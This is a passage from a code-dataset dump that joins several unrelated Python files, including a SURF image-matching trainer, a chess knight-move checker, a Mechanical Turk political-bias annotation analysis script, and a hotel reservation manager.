print "imd: ", imDescPath
with open(imDescPath, 'r') as imDF:
# read this file using reader
reader = IDR.ImageDescriptionReader()
imageDesc = reader.read(imDF)
# fetching relevant SURF features
imagePath = os.path.join(root, file1)
image = cv2.imread(imagePath)
(keypoints, descriptors) = trainingUtils.findSURF(image, self.threshold)
# adding orientation to trainedObject
trainedObject.addOrientation(self.threshold, (imageDesc, keypoints, descriptors, imagePath))
# once trained all orientations we can add the object to the DBase
trainedObjects.append(trainedObject)
return trainedObjects
def learn(self, inputFolder):
self.trainedObjects = self.__train(inputFolder)
def test(self, inputFolder, outputFolder):
cvUtilities = TU.Utils(self.threshold)
imageDescWriter = IDW.ImageDescriptionWriter()
for file1 in os.listdir(inputFolder):
# do not use .* files
if file1.startswith("."):
continue
# save output (the name of the object without .bmp / .jpg etc)
fileName = os.path.basename(file1)
fileName = os.path.splitext(fileName)[0]
imgOutPath = os.path.join(outputFolder, fileName)
if not os.path.exists(imgOutPath):
os.mkdir(imgOutPath)
# with image files do ...
if not file1.endswith(".imd"):
# flags are set to 0 = meaning grey scale
testImage = cv2.imread(os.path.join(inputFolder, file1), flags=0)
utils = TU.Utils(self.threshold)
(kp, desc) = utils.findSURF(testImage, self.threshold)
print "Loaded test image : '%s'" % file1
kpImage = cv2.imread(os.path.join(inputFolder, file1))
utils.drawKeypoints(kpImage, kp, color=(255, 255, 0))
cv2.imwrite(os.path.join(outputFolder, file1), kpImage)
matcher = SFM.SURFFlannMatcher(self.trainedObjects, self.threshold)
match = matcher.matchObject(testImage)
print "Finished processing file '%s'" % file1
for obj in match:
print "Object Name: ", obj[0].name
print "OrientationName: ", obj[0].orientations[obj[1]][0].name
with open(os.path.join(imgOutPath, "computed") + ".imd", 'w') as fileStream:
imageDescWriter.write(fileStream, obj[0].orientations[obj[1]][0])
matchedPath = obj[0].orientations[obj[1]][3]
#show the match
matchedImage = cv2.imread(matchedPath, cv2.IMREAD_GRAYSCALE)
vis = utils.draw_match(matchedImage, testImage, obj[4][0], obj[4][1], obj[2], obj[3])
# show image
cv2.imshow("match!", vis)
cv2.waitKey()
# with .imd files to this
else :
src = os.path.join(inputFolder, file1)
dst = os.path.join(imgOutPath, "expected.imd")
print "Coping the file '%s' into '%s'" % (src, dst)
shutil.copyfile(src, dst)
|
StarcoderdataPython
|
11230155
|
from .upload import UploadImporter
from .vandy import VandyImporter
available_importers = {
cls.__name__: cls
for cls in [
UploadImporter,
VandyImporter,
]
}
|
StarcoderdataPython
|
13178
|
<filename>2808.py
def conv(s):
    # map the file letter (a-h) to its column number (1-8) and keep the rank digit
    v = str(ord(s[0]) - ord('a') + 1)
    v += s[1]
    return v
e = str(input()).split()
a = conv(e[0])
b = conv(e[1])
ax = int(a[0])
ay = int(a[1])
bx = int(b[0])
by = int(b[1])
if (abs(ax - bx) == 1 and abs(ay - by) == 2) or (abs(ax - bx) == 2 and abs(ay - by) == 1):
print('VALIDO')
else: print('INVALIDO')
|
StarcoderdataPython
|
8030330
|
from hermes.core.attributes import set_encoder
from hermes.language import Language
from hermes.tag.pos import PartOfSpeech
import hermes.types as htypes
"""
Copyright 2017 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = '<NAME>'
set_encoder(htypes.PART_OF_SPEECH, lambda x: PartOfSpeech.of(x))
set_encoder(htypes.LANGUAGE, lambda x: Language.of(x))
|
StarcoderdataPython
|
395727
|
from collections import defaultdict, Counter
import csv
import random
import json
from nltk.metrics import agreement
# constants
HITID = "HITId"
LABEL = "Answer.political bias.label"
WORKERID = "WorkerId"
WORKTIME = "WorkTimeInSeconds"
APPROVE = "Approve"
TEXT = "Input.text"
sample_path = "amt_output_csv/abortion_batch_results.csv"
class CorpusAnalysis(object):
def __init__(self, data_path):
self.table_titiles = list()
# ['HITId', 'HITTypeId', 'Title', 'Description', 'Keywords', 'Reward', 'CreationTime', 'MaxAssignments', 'RequesterAnnotation', 'AssignmentDurationInSeconds', 'AutoApprovalDelayInSeconds', 'Expiration', 'NumberOfSimilarHITs', 'LifetimeInSeconds', 'AssignmentId', 'WorkerId', 'AssignmentStatus', 'AcceptTime', 'SubmitTime', 'AutoApprovalTime', 'ApprovalTime', 'RejectionTime', 'RequesterFeedback', 'WorkTimeInSeconds', 'LifetimeApprovalRate', 'Last30DaysApprovalRate', 'Last7DaysApprovalRate', 'Input.video_title', 'Input.policy', 'Input.media', 'Input.text', 'Answer.political bias.label', 'Approve', 'Reject']
self.full_table = list()
self.hitid_labels = defaultdict(list)
self.hitid_goldlabel = defaultdict(str)
self.hitid_majoritylabel = defaultdict(str)
self.hit_adjudicate = defaultdict(list)
with open(data_path, mode="r") as infile:
reader = csv.reader(infile)
for i, row in enumerate(reader):
if i == 0:
self.table_titiles = row
else:
self.full_table.append(row)
self.hitid_labels[row[0]].append(row[-1])
self.title_index = {k: v for v, k in enumerate(self.table_titiles)}
self.policy = self.full_table[0][self.title_index["Input.policy"]]
def populate_hitid_goldlabel(self):
# get the majority voting as the gold label in hit_goldlabel
# me as adjudicator breaking ties manually in hit_adjudicate
for k, v in self.hitid_labels.items():
majority_label = Counter(v).most_common()[0][0]
majority_label_count = Counter(v).most_common()[0][1]
if len(v) == 3 and majority_label_count != 1:
self.hitid_goldlabel[k] = majority_label
self.hitid_majoritylabel[k] = majority_label
else:
self.hit_adjudicate[k] = v
# get Majority aggregation/ties
# print(len(self.hit_goldlabel))
# print(len(self.hit_adjudicate.keys()))
##TODO:change this when get full data and manually adjudicated
for k, v in self.hit_adjudicate.items():
self.hitid_goldlabel[k] = v[0]
# adjudicate, get the gold labels
for row in self.full_table:
hit_id = row[self.title_index[HITID]]
label = row[self.title_index[LABEL]]
if label == self.hitid_goldlabel.get(hit_id, "non-exist"):
row.append("Approved")
else:
row.append("Rejected")
# get label distribution:
# print(Counter(self.hit_goldlabel.values()))
# print("*****************************************")
def turker_accuracy(self):
# get how many turkers got it right/wrong
adjudication_list = list()
for row in self.full_table:
adjudication_list.append(row[-1])
# print("*****************************************")
# print(Counter(adjudication_list))
worker_app_rej = defaultdict(list)
for row in self.full_table:
if row[self.title_index[APPROVE]] == "Approved":
if worker_app_rej[row[self.title_index[WORKERID]]]:
worker_app_rej[row[self.title_index[WORKERID]]][0] += 1
else:
worker_app_rej[row[self.title_index[WORKERID]]].append(1)
worker_app_rej[row[self.title_index[WORKERID]]].append(0)
else:
if worker_app_rej[row[self.title_index[WORKERID]]]:
worker_app_rej[row[self.title_index[WORKERID]]][1] += 1
else:
worker_app_rej[row[self.title_index[WORKERID]]].append(0)
worker_app_rej[row[self.title_index[WORKERID]]].append(1)
worker_error_rate = {
k: [v[0] / (v[0] + v[1]), v[0] + v[1]] for k, v in worker_app_rej.items()
}
sorted_worker_error_rate = {
k: v
for k, v in sorted(
worker_error_rate.items(), key=lambda item: item[1][1], reverse=True
)
}
with open("turker_accuracy/{}.json".format(self.policy), "w") as f:
json.dump(sorted_worker_error_rate, f, indent=2)
x = sum(a[0] for a in sorted_worker_error_rate.values())
y = sum(a[1] for a in sorted_worker_error_rate.values())
length = len(sorted_worker_error_rate)
return x / length, y / length
# def get_iaa(self):
# iaa_data = list()
# prev_hitid = full_table[0][title_index[HITID]]
# for i in range(0, len(full_table), 3):
# iaa_data.append([0, full_table[i][title_index[HITID]], full_table[i][title_index[LABEL]]])
# iaa_data.append([1, full_table[i+1][title_index[HITID]], full_table[i+1][title_index[LABEL]]])
# iaa_data.append([2, full_table[i+2][title_index[HITID]], full_table[i+2][title_index[LABEL]]])
#
# task = agreement.AnnotationTask(data=iaa_data)
# print(task.kappa())
# print(task.alpha())
def get_data(self):
self.hitid_text = defaultdict(str)
for row in self.full_table:
self.hitid_text[row[self.title_index[HITID]]] = row[self.title_index[TEXT]]
text_adjudicate = set()
for id in self.hit_adjudicate:
text_adjudicate.add(self.hitid_text[id])
# print(text_adjudicate)
# with open('tied_sents/{}.txt'.format(self.policy), 'w') as f:
# f.write("\n\n".join(text_adjudicate))
def get_training_data(self):
data = [["text", "label"]]
for id, label in self.hitid_goldlabel.items():
data.append([self.hitid_text[id], label])
with open("unsplitted_data/{}.csv".format(self.policy), "w") as out:
csv_out = csv.writer(out)
for row in data:
csv_out.writerow(row)
def get_avg_accuracy(self):
agreed = 0
disagreed = 0
for id, labels_list in self.hitid_labels.items():
for label in labels_list:
if label == self.hitid_goldlabel[id]:
agreed += 1
else:
disagreed += 1
return agreed / (agreed + disagreed)
def get_wawa(self):
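        # WAWA ("worker agreement with aggregate"): fraction of individual labels that match their item's majority label.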
agreed = 0
disagreed = 0
for id, labels_list in self.hitid_labels.items():
for label in labels_list:
if label == self.hitid_majoritylabel[id]:
agreed += 1
else:
disagreed += 1
return agreed / (agreed + disagreed)
def get_random_sampling_accuracy(self, num_sample=100):
keys = random.sample(self.hitid_labels.keys(), num_sample)
agreed = 0
disagreed = 0
for id in keys:
for label in self.hitid_labels[id]:
if label == self.hitid_goldlabel[id]:
agreed += 1
else:
disagreed += 1
return agreed / (agreed + disagreed)
if __name__ == "__main__":
policies = [
"healthcare",
"economic",
"immigration",
"education",
"abortion",
"LGBTQ",
"gun",
"environment",
]
data_paths = [
"amt_output_csv/{}_batch_results.csv".format(policy) for policy in policies
]
for path in data_paths:
ca = CorpusAnalysis(path)
ca.populate_hitid_goldlabel()
print(ca.turker_accuracy())
ca.get_data()
ca.get_training_data()
# print("*******************************")
# print(ca.get_avg_accuracy())
# print(ca.get_wawa())
# print(ca.get_random_sampling_accuracy())
# path = '/Users/jinzhao/Desktop/4th_semester/thesis/thesis/amt_output_csv/healthcare_batch_results.csv'
# ca = CorpusAnalysis(path)
# ca.populate_hitid_goldlabel()
# ca.turker_accuracy()
# ca.get_data()
# ca.get_training_data()
|
StarcoderdataPython
|
4993683
|
<reponame>mihailoz/python-term-project
# -*- coding: utf-8 -*-
import dao.ReservationDAO as ReservationDAO
import manager.PermissionManager as PermissionManager
import manager.HotelManager as HotelManager
import manager.RoomManager as RoomManager
import dao.HotelDAO as HotelDAO
def make_reservation(person):
if PermissionManager.has_permission_view_hotel(person):
print("You will be guided step by step to make your reservation. If you want to cancel at any point type '/cancel'")
HotelManager.get_with_options(person, [])
hotel_id = input("Choose a hotel by entering its ID >> ")
if hotel_id != '/cancel':
hotel = HotelDAO.get_by_id(hotel_id)
if hotel is not None:
from_date = input("Choose first day of your reservation (YYYY-MM-DD format) >> ")
if from_date != '/cancel':
to_date = input("Choose last day of your reservation (YYYY-MM-DD format) >> ")
if to_date != '/cancel':
RoomManager.get_rooms_by_hotel(person, hotel_id)
room_id = input("Choose room by entering its ID >> ")
if room_id != '/cancel':
result = ReservationDAO.make_reservation(person, room_id, from_date, to_date)
if result:
print("Reservation made successfully.")
else:
print("Reservation unsuccessful.")
return result
return False
else:
print("Forbidden. You are missing necessary permissions.")
return False
def list_reservations(person):
results = ReservationDAO.list_reservations(person)
print(format_reservation_header())
for result in results:
print(format_reservation(result))
return True
def format_reservation_header():
return \
"| Hotel name | From | To | Total price\n" \
"|-----------------------------+------------+------------+------------"
def format_reservation(reservation):
return u"| {0:28.28}| {1:11}| {2:11}| {3:9.2f}".format(
reservation['name'],
reservation['from_date'],
reservation['to_date'],
reservation['total_price'])
|
StarcoderdataPython
|